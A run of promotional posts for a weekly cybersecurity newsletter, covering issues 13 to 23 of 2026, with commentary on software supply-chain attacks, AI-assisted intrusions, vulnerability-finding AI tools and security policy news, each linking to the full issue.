🕵🏻‍♂️ [InfoSec MASHUP] 23/2026 - Built Broken, Patched by Others.

Another week, another set of trojaned packages, hijacked registries, and one-click credential theft. The operational response is by now well-rehearsed: patch, rotate secrets, enable 2FA, audit your dependencies, check your CI/CD workflows. The patching teams are doing their jobs. The question this week's malware section keeps nudging at is a different one: why is so much of what they're patching broken at the point of creation?

The supply chain attack surface exists because the software ecosystem normalized shipping fast over shipping secure, because package registries scaled adoption without scaling trust infrastructure, and because the developer who published a package with a hardcoded credential and the organization running it in production are rarely the same person bearing the consequences. #IBM and #RedHat just committed $5 billion to fix this upstream. #CISA launched CI Fortify to help #OT operators survive worst-case scenarios downstream. Both efforts are necessary. Both are also symptoms of an industry that has spent decades externalizing the cost of insecure software onto the people least positioned to refuse it.

→ Week #23/2026 also covers: Palo Alto Networks Alto GlobalProtect auth bypass is actively exploited, Weil, Gotshal & Manges LLP reportedly paid $20M to keep client files quiet, and the #EU is moving to limit U.S. cloud in sensitive infrastructure

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-23-2026-built-broken-patched-by-others

If you find it useful, subscribe to get it in your inbox every weekend 📨

#infosecMASHUP #cybersecurity #infosec #threatintel #AI

🕵🏻‍♂️ [InfoSec MASHUP] 22/2026 - The Patch Is Scaling. So Is the Attack.

#Megalodon backdoored 5,500 #GitHub repositories in six hours. Not six days — six hours. Malicious commits silently replacing CI/CD workflows, hoovering tokens, cloud credentials, SSH keys, and environment variables before most of the affected projects had processed a single alert. The same week, #IBM and #RedHat announced a $5 billion commitment, called Project Lightwell, to securing the open source supply chain, #Anthropic's #Mythos model surfaced 23,000 potential vulnerabilities across 1,000 OSS projects, and Apple open-sourced its quantum-resistant crypto stack with formal verification proofs attached. The industry's response to supply chain risk is finally arriving at a scale that looks serious.

The problem is the math. The response is measured in billions of dollars and multi-year programs. The attack is measured in hours and automated tooling. Megalodon's six-hour window isn't an anomaly — it's a benchmark. Last week it was TeamPCP and the GitHub cascade. The week before, Laravel Lang and malicious postinstall hooks across 700 repos. The investment in defense is real and necessary, but it's being deployed against a threat that doesn't need a budget cycle to iterate. Project Lightwell will fund important work. Megalodon already shipped.

→ Week #22/2026 also covers: #ShinyHunters hit Carnival, Charter, and Mytheresa, the Dutch blocked a U.S. takeover of their national ID infrastructure, and Iran-linked actors are coding backdoors with AI assistance.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-22-2026-the-patch-is-scaling-so-is-the-attack

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI

🕵🏻‍♂️ [InfoSec MASHUP] 21/2026 - The Supply Chain Didn't Break. It Was Walked.

This week's issue reads like a case study in cascade failure. A malicious VS Code extension on one #GitHub employee's device leads to 3,800 internal repositories exfiltrated — by #TeamPCP, the same group that poisoned 170 npm and #PyPI packages last week. #Grafana gets breached via a token nobody rotated after the TanStack attack, itself a TeamPCP operation. A GitHub Action used by thousands of projects gets compromised and starts exfiltrating CI/CD credentials. And somewhere in a public GitHub spreadsheet, CISA contractor credentials — including #AWS GovCloud keys — sat waiting to be found.

These aren't four separate incidents. They're one incident with four manifestations. The supply chain isn't a vector anymore; it's the terrain. Developer tooling, CI/CD pipelines, third-party actions, tokens issued and forgotten — all of it is now actively mapped and exploited with a persistence that makes the traditional "patch and move on" response look quaint. The Verizon DBIR dropped this week noting that third-party compromise is surging. The week's news was already illustrating the point before the report landed.

→ Week #21/2026 also covers: fast16 predated #Stuxnet and corrupted nuclear simulations quietly, #Pwn2Own Berlin paid $1.3M for 47 bugs, and #Bluesky got hijacked for Russian propaganda.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-21-2026-the-supply-chain-didn-t-break-it-was-walked

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI

🕵🏻‍♂️ [InfoSec MASHUP] 20/2026 - The Platform Is the Attack Surface.

The supply chain attack story this week isn't about a sketchy package lurking in a dark corner of npm. It's about #Anthropic Claude.ai shared chats being used to distribute Mac #malware, a fake Hugging Face repository impersonating OpenAI's Privacy Filter trending at #1 with 244,000 downloads, and JDownloader's own website serving swapped installers. The common thread isn't sophistication — it's borrowed credibility. Attackers have figured out that the detection model most users rely on, implicitly or otherwise, is "I've heard of this platform, therefore this thing on it is probably fine."

That assumption has always been fragile. What's changed is how systematically it's being exploited. A trending repo with a quarter-million downloads looks legitimate by every surface signal. A shared Claude.ai chat looks like a helpful resource. A download from the official project website looks like the official project. The trust isn't in the content — it's in the container. And the container is now the attack surface.

→ Week #20/2026 also covers: #ShinyHunters got paid, #TeamPCP hit 170 packages across npm and PyPI, and Cisco's SD-WAN zero-day count hit six for the year

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-20-2026-the-platform-is-the-attack-surface

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI

Offense Just Got a Co-Pilot.

The story that should not get buried under this week's patch pile is a quiet one from the ICS/OT section: attackers used #Claude and #ChatGPT to assist an intrusion into a water utility in Monterrey. The OT #breach ultimately failed — but that's almost beside the point. What the Dragos report actually documents is AI being used as a competent recon assistant: autonomously identifying a vNode SCADA/IIoT interface, recommending a password-spray attack, and generating a Python toolkit on the fly. No novel exploit. No nation-state budget. Just patience and a chat window.

This is the part of the AI-in-security conversation that tends to get lost between the breathless vendor marketing and the "fully autonomous AI attacks are not yet observed" reassurances. The threat doesn't need to be autonomous to be meaningful. Lowering the reconnaissance floor — making #OT infrastructure more legible to attackers who previously lacked the domain knowledge to navigate it — is already a significant capability shift. The Monterrey incident didn't succeed. The next one will be run by someone who learned from it.

→ Week #19/2026 also covers: A 64-day cPanel zero-day window, #ShinyHunters hits an ed-tech giant, and Europe blocks #Huawei from its solar grid.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-19-2026-offense-just-got-a-co-pilot

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI

🕵🏻‍♂️ [InfoSec MASHUP] - This week's news cycle handed us the usual parade of breaches, arrests, and patch-your-stuff urgency — but if you squint at the #Malware section long enough, a more uncomfortable story emerges. #SAP-related npm packages backdoored with a credential stealer. A popular #PyPI package hijacked via a forged signed release pushed through a compromised GitHub Actions workflow. Seventy-three "sleeper" extensions quietly sitting in #OpenVSX, waiting. The common thread: attackers aren't breaking down the front door anymore. They're walking in through the tools developers use every day, often with a valid signature and a clean commit history.

What makes this particularly fun — in the way a slow-motion disaster is fun — is that the blast radius isn't just the developer who ran pip install. It's every downstream user, every CI/CD pipeline, every AI coding agent that helpfully executed the preinstall hook without asking questions. The supply chain isn't a niche threat vector reserved for nation-state ops anymore. It's where commodity attackers are increasingly playing, because it scales beautifully and the detection gap remains embarrassingly wide.

→ Week #18/2026 also covers: Supply chain attackers found the path of least resistance, #OpenSSH patched a bug older than most junior devs, and #Europe is done pretending U.S. #cloud is a neutral choice.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-18-2026-shinyhunters-week-off-they-didn-t-take-one

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI

Attackers have AI. So now defenders need #AI. So vendors are shipping fast. And somewhere in that chain, someone hands access to a third-party vendor, and Anthropic's most restricted product ends up in unauthorized hands. This is the new normal: accelerated development, accelerated deployment, and attack surface that grows with every integration.

The pressure is real — threat actors are using AI to find vulnerabilities faster, craft more convincing phishing, and automate what used to require skill and time. The defensive tooling market is responding accordingly, and Anthropic's #Mythos is just the most visible example of a broader wave. But visibility cuts both ways. The more these tools embed themselves into organizational security infrastructure, the more they become targets themselves. A tool that finds 271 #Firefox #bugs is a tool someone else very much wants access to.

The answer isn't to slow down — it's to stop treating secure architecture as something you bolt on after shipping. Secure development practices, supply chain controls, and disciplined access management aren't obstacles to speed. They're what makes speed sustainable. The threat isn't going to wait for the industry to catch up, but neither will the next vendor breach. Align the pace of deployment with the rigor of the process — or expect to keep reading about it here.

→ Week #17 /2026 also covers: Scattered Spider pleads guilty, a #ransomware negotiator on the wrong payroll, and a China-linked #backdoor in US federal Cisco firewalls.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-17-2026-bolt-on-security-won-t-cut-it

If you find it useful, subscribe to get it in your inbox every weekend 📨

#infosecMASHUP #cybersecurity #infosec #threatintel #AI

🐛 Faster Bugs, Same Backlog — #Mythos Preview found thousands of zero-days across every major OS and browser in a matter of weeks. Anthropic was nervous enough about it to not release it publicly. That's notable. What's also notable is that "thousands of critical vulnerabilities" describes a perfectly ordinary patch Tuesday for most security teams — the backlog isn't new, the speed is.

The uncomfortable truth Project #Glasswing surfaces isn't that attackers are about to get a superpower (they are), it's that defenders have been relying on a fundamentally broken triage model for years. CVSS 10 gets the fire drill. The exploitable CVSS 6 sitting on an internet-facing legacy box gets the backlog. That gap is the actual attack surface. AI-accelerated discovery doesn't fix it — it just makes it more expensive to ignore.

→ Week #16/2026 also covers: AI vishing platforms hit the cybercrime market, NIST quietly caps CVE coverage, and Russia goes after a Swedish power grid.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-16-2026-faster-bugs-same-backlog

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI

Cybercrime losses hit $20.9 billion in 2025 — a 26% jump, per the FBI's IC3 report. That figure covers only what victims bothered to report, so treat it as a floor, not a ceiling. This week's issue arrives alongside a proposal to cut CISA's budget by $707 million. Whether that's a bold strategic bet or a spectacular misread of the moment is, apparently, still under debate.

→ Week #15/2026 also covers:

REvil's alleged leader unmasked, Adobe Reader zero-day since December, and the most uncomfortable job interview you'll watch this week.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-15-2026-budgets-cut-breaches-climbing

If you find it useful, subscribe to get it in your inbox every weekend 📨

#infosecMASHUP #cybersecurity #infosec #threatintel #AI

RSA Conference was in full swing in San Francisco this week — booths, buzzwords, and billion-dollar pitches as far as the eye can see. Meanwhile, out in the real world, threat actors didn't get the memo. Iran-linked hackers are using Telegram to hunt down dissidents and journalists, while TeamPCP's supply chain worm is deploying Kubernetes wipers that specifically target Iranian clusters. Two sides of the same geopolitical coin, playing out in parallel — and neither one is buying a vendor badge.

→ Week #13/2026 also covers:

🪱 TeamPCP's worm ;

🇮🇱 🇮🇷 Iran's hacked cameras ;

🆙 ✅ A Tycoon 2FA that just won't die ;

❌ 🇺🇸 The FCC has banned the sale of new consumer routers made outside the USA;

💰️ #OpenAI launched a public safety bug bounty for #AI-specific abuse and safety risks;

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-13-2026-rsa-week-real-world-problems

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel